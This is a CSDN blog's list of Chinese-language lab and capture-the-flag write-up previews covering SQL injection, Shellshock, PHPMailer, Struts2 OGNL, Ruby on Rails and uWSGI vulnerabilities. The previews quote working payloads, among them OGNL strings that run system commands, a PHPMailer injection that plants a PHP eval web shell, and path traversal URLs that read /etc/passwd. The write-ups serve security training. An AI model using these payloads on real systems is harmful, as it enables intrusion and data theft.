半情调-CSDN博客

经过测试，发现空格，符号等都被过滤，所以通过替换被过滤的符号并且进行url编码后才能继续注入；测试列数；/**/order/**/by/**/5#%2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%35%23以下级联查询需将id=1改为id=-1，才能显示级联后的查询内容；测试显位点；/**/union/*...

2019-11-14 16:46:12 487

原创 0x2E.SQL手工注入漏洞测试(SQLite数据库)

通过加单引号及使用and进行判断存在sql注入；使用order by测试存在4列；通过联合查询得到显示位；通过sqlite_master隐藏表爆表名及建表语句；建表语句中可以得到表名及列名，可以爆出数据；Md5解密后得到密码；登录得到key；SQLite存在sqlite_maste...

2019-11-14 16:08:17 259

原创 0x2D.Bash漏洞分析溯源

Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下；抓包后在HTTP请求中插入poc；poc：User-Agent: () { :;}; echo; /bin/ls /再构造poc能够查看key文件；漏洞详情：https://www.freebuf.com/vuls/44994.html...

2019-11-01 16:47:49 186

原创 0x2C.PHPMailer远程命令执行漏洞溯源

在页面的最下方能够发现一个mail连接，点击能够进入发送邮件的界面，或者使用burpsuite的spider模块同样能够找到mail界面；填写数据后点击发送邮件并进行抓包；修改email和message的内容；"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/b.php @aaa.com<?php @eval($_POST[cm...

2019-10-24 14:59:17 206

原创 0x2B.BeesCMS系统漏洞分析溯源

通过使用御剑扫描得到了后台页面，测试了一下admin/admin，发现能够登陆，存在弱口令；登陆到后台页面，发现操作系统是linux，开始寻找能够上传shell的页面；寻找后发现，后台的功能都不能实现，但是在报错信息中能够得到网站目录为/var/www/html；查找资料后发现在登陆界面存在SQL注入；在admin后加'测试，发现页面报错；通过order by测试得...

2019-10-23 15:14:27 766

原创 0x2A.HTTP头注入漏洞测试(X-Forwarded-for)

该题可以进行手注或者使用sqlmap；首先进行手注，抓包后添加X-Forwarded-for:*'测试发现并没有报错，而且这样保存下来在sqlmap中检测也检测不到SQL注入；修改为* or 1=1会报错，但是后续测试也会出问题，只有不添加ip地址或者*才能正常进行sql注入；通过or 1=1检测是否能进行sql注入；查询显示位，结果为4的时候显示正常；通过联合查询查询...

2019-10-22 15:28:30 247

原创 0x29. Apache Struts2远程代码执行漏洞(S2-037)复现

s2-037：使用REST插件启用动态方法调用时，可以传递可用于在服务器端执行任意代码的恶意表达式；使用http://localhost:8080/1/XXX这种请求方式，XXX可以是任何合法的名字，通过将XXX构造为OGNL执行命令；poc：#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]...

2019-10-22 09:54:00 565

原创 0x28.Apache Struts2远程代码执行漏洞(S2-032)复现

s2-032：启用动态方法调用后，可能会传递可用于在服务器端执行任意代码的恶意表达式；接收到的参数会经过处理存入到ActionMapping的method属性中，最后会将method属性中的值当做ognl表达式执行；poc：?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]...

2019-10-21 17:04:08 403

原创 0x27.Apache Struts2远程代码执行漏洞(S2-029)复现

s2-029：强制使用Apache Struts框架时，会对分配给某些标签的属性值进行双重评估，因此可以传递将在呈现标签属性时再次评估的值打开源代码发现传递的参数为message；poc：(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAcces...

2019-10-21 15:43:36 641

原创 0x26.Apache Struts2远程代码执行漏洞(S2-019)复现

s2-019：动态方法调用是一种已知会施加可能的安全漏洞的机制，但到目前为止，它默认启用，警告用户应尽可能将其关闭；构造poc：?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set...

2019-10-21 10:18:22 843

原创 0x25. Apache Struts2远程代码执行漏洞(S2-009)复现

s2-009：OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护（正则表达式，拒绝方法调用），从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。在S2-003和S2-005中已经解决了类似的行为，但事实证明，基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。ParametersInterceptor中的正...

2019-10-18 15:33:10 300 1

原创 0x24.Apache Struts2远程代码执行漏洞(S2-008)复现

s2-008：1.Cookie 拦截器错误配置可造成 OGNL 表达式执行；2.开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令；构造poc验证漏洞；poc：?debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfal...

2019-10-17 16:12:53 551

原创 0x23. Apache Struts2远程代码执行漏洞(S2-005)复现

通过构造poc测试漏洞；poc：%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29%3Dtrue&%28b%29%28%28%27\43context%5B\%27xwork.MethodAccessor.denyMethodExecution\%27%5D\75false%27%29%28b%29%29&%28...

2019-10-17 14:33:53 769

原创 0x22. Apache Struts2远程代码执行漏洞(S2-015)复现

s2-015：1.漏洞产生于配置了 Action 通配符 *，并将其作为动态值时，解析时会将其内容执行 OGNL 表达式；2.通过result二次引用执行；通过poc测试是否存在s2-015漏洞；poc：%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_membe...

2019-10-17 10:24:59 320

原创 0x21.Apache Struts2远程代码执行漏洞(S2-007)复现

s2-007：当配置了验证规则，类型转换出错时，进行了错误的字符串拼接，进而造成了OGNL语句的执行；抓包，在age值处输入poc；poc：'+(#application)+'判断出在age输入框存在s2-007漏洞；输入poc查找key文件位置，得到key值；poc：%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...

2019-10-16 16:08:39 3211

原创 0x20.Apache Struts2远程代码执行漏洞(S2-004)复现

s2-004：Struts2调度程序逻辑允许为请求URI提供在Web应用程序的类路径中找到的某些静态资源，这些请求URI具有以“ / struts /”开头的上下文相对路径。FilterDispatcher（在2.0中）和DefaultStaticContentLoader（在2.1中）具有一个安全漏洞，攻击者可以使用双重编码的url和相对路径来遍历目录结构并下载“静态”内容文件夹之外的文件；...

2019-10-16 11:20:00 150

原创 0x1F. Apache Struts2远程代码执行漏洞(S2-001)复现

s2-001：WebWork 2.1+和Struts 2的“ altSyntax”功能允许将OGNL表达式插入文本字符串并进行递归处理。这允许恶意用户通常通过HTML文本字段提交包含OGNL表达式的字符串，如果表单验证失败，该字符串将由服务器执行；通过账号处输入%{1+2}提交后得到返回值 3可判断出s2-001漏洞；通过构造poc得到查看根目录，发现key文件；poc：%...

2019-10-16 10:33:32 306

原创 0x1E. Apache Struts2远程代码执行漏洞(S2-016)复现

s2-016：在2.3.15.1之前的Struts 2中，“ action：”，“ redirect：”或“ redirectAction：”之后的信息未正确清除。由于所述信息将根据值堆栈作为OGNL表达式进行评估，因此这引入了注入服务器端代码的可能性；使用工具检测s2-016漏洞，发现存在漏洞；命令执行，发现key.txt;查看文件，得到key；poc：http:...

2019-10-15 17:06:30 539

原创 0x1D.Ruby On Rails漏洞复现第二题（CVE-2019-5418）

通过查找cve2019-5418漏洞详情，得知通过访问“/chybeta”路径，修改Accept为 ../../../../../../etc/passwd{{ 实现文件读取；但是发现不存在chybeta；通过查找后发现存在robots；通过访问robots路径，能够实现文件读取；漏洞详情：https://xz.aliyun.com/t/4448...

2019-10-15 10:30:09 503

原创 0x1C.uWSGI 漏洞复现（CVE-2018-7490）

uWSGI存在路径遍历；payload：http://219.153.49.228:48681/..%2f..%2f..%2f..%2f..%2f..%2fkey.txtCVE-2018-7490漏洞详情：https://www.anquanke.com/vul/id/1124864

2019-10-14 15:57:05 1474 1

原创 0x1B.Ruby On Rails漏洞复现第一题（CVE-2018-3760）

构造payload，读取/etc/passwd文件；http://219.153.49.228:46944/assets/file:%2f%2f/etc/passwdpasswd在黑名单中，不被允许访问，但是报错信息中给出了允许访问的目录，通过使用允许访问的目录可以跳转到/etc/passwd；payload如下：http://219.153.49.228:46944/asset...

2019-10-14 15:34:35 509

原创 0x1A.X-Forwarded-For注入漏洞实战

抓包，添加xff并在后面添加'进行测试是否有注入漏洞；发现在xff处能够进行注入；将burpsuite抓包后修改xff保存为txt文件并使用sqlmap爆库；爆表名；爆列名；爆数据；登录得到key；...

2019-10-11 12:22:12 116

原创 0x19.Apache Struts2远程代码执行漏洞(S2-013)

通过构造payload执行命令；payload：%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20ja...

2019-09-27 21:58:37 273